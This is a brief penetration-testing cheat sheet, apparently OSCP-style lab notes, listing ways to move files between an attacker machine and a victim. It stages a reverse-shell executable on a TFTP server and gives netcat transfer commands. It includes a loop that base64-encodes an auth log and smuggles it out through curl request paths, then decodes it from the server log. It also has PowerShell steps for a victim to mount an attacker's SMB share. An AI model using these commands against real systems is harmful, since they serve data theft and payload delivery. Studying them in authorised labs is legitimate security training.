#ftp tftp file transfer 
root@PWK-KALI:~/# mkdir /tftp
root@PWK-KALI:~/# atftpd --daemon --port 69 /tftp
root@PWK-KALI:~/# cp reverse_1337.exe /tftp/
root@PWK-KALI:~/# 


# Netcat file transfer:
#Receiver:
nc -nlvp 1337 > somefile.exe
#Sender:
nc -nv 10.0.0.22 1337 < /some file


#HTTP File transfer:
#Receiver:
python -m "SimpleHTTPServer" 8080 2>test.log
#Sender:
for i in $(cat /labs/1.3/auth.log |base64); do curl http://127.0.0.1:8080/$i; done
#Receiver:
cat test.log |grep -Eo '[A-Za-z0-9\+\/\=]{40,100}' |sed 's/\///g' >file.txt
#Receiver:
cat file.txt |base64 -d >file.txt.decoded

#PowerShell/SMB Share File Transfer
#Attacker:
impacket-smbserver SomeShare `pwd`
#victim:
New-PSDrive -Name "LocalNameOfSomeSort" -PSProvider "Filesystem" -Root "\\REM.OTE.IP.ADDR\\SomeShare"
#victim:
cd LocalNameOfSomeSort:
